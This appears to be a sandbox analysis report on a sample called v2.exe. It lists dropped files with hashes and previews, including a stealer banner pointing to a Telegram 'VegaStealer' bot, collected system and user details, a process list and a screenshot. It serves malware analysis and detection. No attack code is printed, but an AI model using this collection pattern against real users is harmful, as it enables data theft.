SHA1:	60945B6BC3027451A2E1CFA29D263A994F50E91A
SHA-256:	19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
SHA-512:	86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
Malicious:	false
Preview:	EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

C:\Users\user\AppData\Roaming\PyFDX932923.user\Files\NVWZAPQSQL\TQDFJHPUIU.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697771666106845
Encrypted:	false
SSDEEP:	24:TwdgExX6lswcsA1Wo1+js3mQmFlw2UJh6QHssg9RGVQ8:T6KiV+KmQmFwhtMp9RGVH
MD5:	D910958AF930D9DCA27D8F529EC053D0
SHA1:	321478679C760C347743149A323469AD4BFEA87D
SHA-256:	C70010ABE33AC34A7DB2F84B5ECDEA5EF95D482B69138707C126D2C1C1B67F37
SHA-512:	0BCADFF480F8F0C7E5DDC316F678564A75785640F151ACA644CABE64AD10D0D4AD6156385A4B04DF9025C6ADCDB3787123EC21F57610F1A7FBC7727A12EB8A00
Malicious:	false
Preview:	TQDFJHPUIUELSDZVLDSOEPJOAGZMFPGEGXRLLWCATKTXUFCCYBMLLTOAWXCBRXEASQCNMLCVLTUZVHIGECOSKDAKWRYISSWUBTJPNWVMOQIBOVCDGZBZLOBWHRRJWCIVVOOXQYXMXXZMUJFNAGIRMQEQNBGKVATBJCBUBSWVZNUBPOSGZZKDLPMWNJJYMXSJFTKODUAYUUUFMAXNGYJPXGZQGSVLQUGDVVRJNEOKUCNTIRLLCNKTYMTQNZJJKSKBSONPJUKRASZVNLIXIMVFHLBZMMQBRQMADRKDIUMEEGDUNISFUQIECDZCRHSRRYZPGKJVXJOWYFDCIFWRPIQIGFARPTXNAEOTZASGGBUAORTYTQKACAIMSIJTKMTNMLSJSOHBNKDCPBUROQGRJNZUWHAQAOIYBGRJZNQFPXFARCDCRYDEHQKZSBWQRIZUALGAGONASBDAUUWWGWMIACXEKQGBFHNSVOMSMNKHUCCICMZPSQBAOJSAJLHYYTHCBOJYRGLPACKOYWSINXQWZTVPZZGDMLUEMLVMWGYQVWJXSKGMTZXFWDQTDCMARKFNKCUZOJJCUBDFZIQECIQSBZWGGGYXJKXBOJMSDVJPFGXNBLAVKQLERCTILRLNODWOHUHAHUKXKKYDMHZJUTFVHEQDYGBYCPPMSUVFTBPYSDWSPRWOOVOMFFXVHKXCQNSANIDGQLMMNSDROMFQDXTGDYVZZKZMXJGFRGTCUUWAEMNPZJJQANNDMULSUEIOQHQUZBJGBBFBYEITVHYSXFUDFMPLOAIHQGZLPYMHUKXYLKLKILTNDAXWVKITWAKIJERKCLMHSEKWBLLPKKZZWHXZMSHTTCPRPQUXXDNKWNYSNTNWEZAVSUMPTOQBTAMVGRIMPCIHLVZDKXOJHRUGCUCYCCGSKYZFHLNROAETESAVZHHZSEDGXUMPIWCICTRSGZRIRINHSZURTKUBQMVZLOYEFVZZTFCGUJKCBMMLKUJTDVWC

C:\Users\user\AppData\Roaming\PyFDX932923.user\Files\NWCXBPIUYI.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696724055101702
Encrypted:	false
SSDEEP:	24:amL3nXTtZkQxqip7hViX2Zka12//5V9PP+Iw5ZrfqoV2P8S7FpwmKxlTn:xXL4ivV62qaI/xVhVWZ+X8SxKDT
MD5:	1FFF6A639C738561CDC01BD436BA77C1
SHA1:	BAFB1D68D43B177330F701BA01CA1AD19CB4FBB8
SHA-256:	C2279E62766B7EFD46442641AECB3D9A0A25CE999296AC5BA9DA7BF18B2BDA92
SHA-512:	65EFD5B1E235EF6AD917EAF95E16E3287CA9720F3F0EE989667A1DBB651693580415182F64FFA7538986E2BE7F19AC030836DF62489BB49C42383F5FCD3FA5D2
Malicious:	false
Preview:	NWCXBPIUYIVIMEKOECOAETPCBVGOLLFSFYSIEWGCQXXYDTHBXCBBHRPJYJIIAKLIVVLYHTWFXTIMRQKNXJVKYWJRGDPRAMVTWAMYMVUPBCODOHNWGVUTTMDRCGQSWUENMIVFDVUFWRBWWAXFGLJCWHJESVSORVMBBPZHMGNOLAZEBTVVZJSGFZDCEBOKEELVIKVUJUJMYXSQXAWBVPYELDJUPEKNZGLXBNUDAABLCYAZVPQYBYHWASQZIKCOZDJXTSUXLKTDHJGSYIZZEGRZZNKKDUJMXSRWEDSBIZWRCWGJILNJNQKYISXAGNMQIWLOTRVEMVUEFFBMOVSUOJIHGLPPIKHURRWPPLYGZVGPLTDDNFHWCGDYBJWXDCKVHBTKZNVCGFMGAYMEPNBBZNTBERBXWUZQOWOXLEBSIXOWEZFEHNZYOEPBPYERLPMITANPJUDWNRNURGGOVPAFPUMUFAJJGHCGGSHCPAKCRSPZJJODRADCRCMYZDUAIWBDBDCPBUYVIRSRMZFDRIJQLLRUECYTILJEKDTTKMJATFJZGEOYRXTQSNGOENKASOPKMGWIWBAOMVIDHMXGNZFQLDKEJHBNZOCNFNIXNHOKWJNDTYAWGDGLYPWBQMSVSXTAECOYAEULSBSJPKKFQWDJACOZKJGANAIJBUMCLKLMRCAXPGXPFJMMBITWGGANYVNUIAJQWHHSWFPPASKHZAUXVZCDBKOWYHZAGAZKRYAWMXNYMSOVNKLUSFMEKYZMJTXYMLLTDLXXHKEEHBYXXFBEBTALQHMYPVOGJLATHUICOJIIQJINSCWPMNRVRLYYRHLAJBLVHEDYTFSDAVKINLNNEEURYKXHNXJMZIQWVOJNOTKRUWHSVTMXWRNJWLJJHPIPSFMIAIWBMNDXXCXXZCPDOKGRINVUVYHCJLFDJIZCOEFTHTRHTIWRPLTKLXPUDEBCIHBMDJOHZRRRYIUNRRIECVWDGMFRWLRMKDBNVTLGPDQC

C:\Users\user\AppData\Roaming\PyFDX932923.user\Files\SQSJKEBWDT\GRXZDKKVDB.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697358951122591
Encrypted:	false
SSDEEP:	24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
MD5:	244A1B624BD2C9C3A0D660425CB1F3C6
SHA1:	FB6C19991CC49A27F0277F54D88B4522F479BE5F
SHA-256:	E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
SHA-512:	9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
Malicious:	false
Preview:	GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

C:\Users\user\AppData\Roaming\PyFDX932923.user\Files\SQSJKEBWDT\NVWZAPQSQL.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6998645060098685
Encrypted:	false
SSDEEP:	24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
MD5:	1676F91570425F6566A5746BC8E8427E
SHA1:	0F922133E2BEF0B48C623BEFA0C77361F6FA3900
SHA-256:	534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
SHA-512:	07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
Malicious:	false
Preview:	NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

C:\Users\user\AppData\Roaming\PyFDX932923.user\Files\TQDFJHPUIU.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.697771666106845
Encrypted:	false
SSDEEP:	24:TwdgExX6lswcsA1Wo1+js3mQmFlw2UJh6QHssg9RGVQ8:T6KiV+KmQmFwhtMp9RGVH
MD5:	D910958AF930D9DCA27D8F529EC053D0
SHA1:	321478679C760C347743149A323469AD4BFEA87D
SHA-256:	C70010ABE33AC34A7DB2F84B5ECDEA5EF95D482B69138707C126D2C1C1B67F37
SHA-512:	0BCADFF480F8F0C7E5DDC316F678564A75785640F151ACA644CABE64AD10D0D4AD6156385A4B04DF9025C6ADCDB3787123EC21F57610F1A7FBC7727A12EB8A00
Malicious:	false
Preview:	TQDFJHPUIUELSDZVLDSOEPJOAGZMFPGEGXRLLWCATKTXUFCCYBMLLTOAWXCBRXEASQCNMLCVLTUZVHIGECOSKDAKWRYISSWUBTJPNWVMOQIBOVCDGZBZLOBWHRRJWCIVVOOXQYXMXXZMUJFNAGIRMQEQNBGKVATBJCBUBSWVZNUBPOSGZZKDLPMWNJJYMXSJFTKODUAYUUUFMAXNGYJPXGZQGSVLQUGDVVRJNEOKUCNTIRLLCNKTYMTQNZJJKSKBSONPJUKRASZVNLIXIMVFHLBZMMQBRQMADRKDIUMEEGDUNISFUQIECDZCRHSRRYZPGKJVXJOWYFDCIFWRPIQIGFARPTXNAEOTZASGGBUAORTYTQKACAIMSIJTKMTNMLSJSOHBNKDCPBUROQGRJNZUWHAQAOIYBGRJZNQFPXFARCDCRYDEHQKZSBWQRIZUALGAGONASBDAUUWWGWMIACXEKQGBFHNSVOMSMNKHUCCICMZPSQBAOJSAJLHYYTHCBOJYRGLPACKOYWSINXQWZTVPZZGDMLUEMLVMWGYQVWJXSKGMTZXFWDQTDCMARKFNKCUZOJJCUBDFZIQECIQSBZWGGGYXJKXBOJMSDVJPFGXNBLAVKQLERCTILRLNODWOHUHAHUKXKKYDMHZJUTFVHEQDYGBYCPPMSUVFTBPYSDWSPRWOOVOMFFXVHKXCQNSANIDGQLMMNSDROMFQDXTGDYVZZKZMXJGFRGTCUUWAEMNPZJJQANNDMULSUEIOQHQUZBJGBBFBYEITVHYSXFUDFMPLOAIHQGZLPYMHUKXYLKLKILTNDAXWVKITWAKIJERKCLMHSEKWBLLPKKZZWHXZMSHTTCPRPQUXXDNKWNYSNTNWEZAVSUMPTOQBTAMVGRIMPCIHLVZDKXOJHRUGCUCYCCGSKYZFHLNROAETESAVZHHZSEDGXUMPIWCICTRSGZRIRINHSZURTKUBQMVZLOYEFVZZTFCGUJKCBMMLKUJTDVWC

C:\Users\user\AppData\Roaming\PyFDX932923.user\Files\ZGGKNSUKOP.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Roaming\PyFDX932923.user\Information.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	1528
Entropy (8bit):	4.511496963805806
Encrypted:	false
SSDEEP:	24:gMMNoEMshMp11IATMphEQQ6pgzayohCowpwl0/Ndt0v03ZVv7V57Nx4:gMMOEMshMp11IATMphEQlpkayohCo6Je
MD5:	324CD37D67EDD3095EC70C60E9026A0E
SHA1:	D78B22D81825B8D3A955C09C1FB131221DF8C632
SHA-256:	9C240B3147850E385AE75B47B1385D20DC66D8A848476EE5858A74F3F2B4E750
SHA-512:	8BCFE0D0430076B629229C93FAEF9B0CEF6A17A6A44522FC596137C445214F7CEC789AFECAD51952044079DDB72EA06908923394FB4E486BF099C36368367B94
Malicious:	false
Preview:	. *******************************************. .................................. . .................................. . .................................. . .................................. . .................................. . .................................. . https://t.me/VegaStealer_bot . . ******************************************* ==================================================. Operating system: Windows 10 Pro (64 Bit). PC user: 932923/user. C

C:\Users\user\AppData\Roaming\PyFDX932923.user\Process.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4221
Entropy (8bit):	4.967603429012699
Encrypted:	false
SSDEEP:	96:lr2RDRRRUlDRRzfUUjt/ReRRlwRURRRDZRRUUmYllmURa71RS+RRhRRRRKUmRRUI:lr2RDRRRUlDRRLUUjt/ReRRqRURRRDZz
MD5:	D77CB2F0B64F2612AF0675009F993620
SHA1:	C3B8EF2C6164384549BE9B8ECEB6400A76C6D249
SHA-256:	88DCD81B71A40F4E79B1230DB236231F6319F17863C0AC15EB610E2535CD1149
SHA-512:	91F3D779259020F2A29E1782341E3B306C1538A88067C858192CF1AA7C4F8B3BE551236C9A2CE3A783B4880AF1F1F5CE077FFCFAD40017C5ED6CDB92801FA190
Malicious:	false
Preview:	NAME: svchost..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: CheatEngine75..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: csrss..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: svchost..NAME: svchost..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: RuntimeBroker..NAME: svchost..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: svchost..NAME: svchost..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: svchost..NAME: spoolsv..NAME: sihost..NAME: svchost..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: svchost..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: svchost..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: backgroundTaskHost..NAME: fontdrvhost..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: fontdrvhost..NAME: svchost..NAME: StartMenuExperienceHost..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: HxUZFnWBmBTYeWekkOumtZvTPw..NAME: HxUZ

C:\Users\user\AppData\Roaming\PyFDX932923.user\Screen.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	721646
Entropy (8bit):	7.930156273019023
Encrypted:	false
SSDEEP:	12288:LN5Ik7hE5TUlevY31R2XSefNYv+h+PD07LOX+TYwCi0kQR5LSOcOvk+HxoldU:Yk78Uj1RySeCv+kZ+UMEHkkim
MD5:	5325588A3053EADCAA1F813C8DFFB15D
SHA1:	E15A26684F6EE5119CCC55B44A080BACDFA8450F
SHA-256:	D378265F52592779079B149DDC0C135CFD3A68D49163405D16A8D182AFEF8EFA
SHA-512:	EF025FED3779F180294B2726DB8F2699CD4363D50BD7E9EED7C2EC79DAB5A8EA5249AB78039CA45DD76760762BDCAE4CF99A439685E80652B3737E6757C65987
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.mG........ms......c...~.VuU..UUt.V.{o......$.......$.,.@.S.E...9...d......./..............1#..;...7f......<9.'...N....^'?5..I......3.......Nx\|..7"S..\|_.....:~..q....-.Wl!..........y1.......0\|...Jo.C.b....H.G.}G0u......X..h.......w...b......S........].\|...J...L.TE..w.....X...{.A.=w.d.."....w.=...w..1...'.....A.Z~0+..>7.o..H.TL......g..L.%.......M.Y..\|_..z.wG...1S..Na....^{.......:Gc..1.....k,\|..z.-...%..2..w.knJ.W......t..3X..S........../.X...c....{e....\?...L..%.7,}E.g..2...X....u........\|..i..y...MK^~M..X......].-....9g.?.}.u..6M.uM..yu..qU.._..\|o9.. .v...9gEn...y......nW.9.K.>..,....hk...=.N.....0^.{....B..+...}.O+........#..=.......].k..../L.zY......\|.\|...v...-.......u3.....+.g].?..]//..-.%.S.s.o...s...;....S;\RX..yLN.s.Kv..P....!.}..v...m/)..;.....osq7.s.a..y_..b-......vy}n5^.m....d.\|..'.<A.y`n..;.1..{.....E%...%.\].

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Windows\Temp\__PSScriptPolicyTest_1zuicyop.01q.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_bk5y351n.dlv.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_dgqukpji.vjq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_lgq3ag5l.2gq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_ow1hlvmf.d30.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_xptjlxwn.iws.ps1

Download File

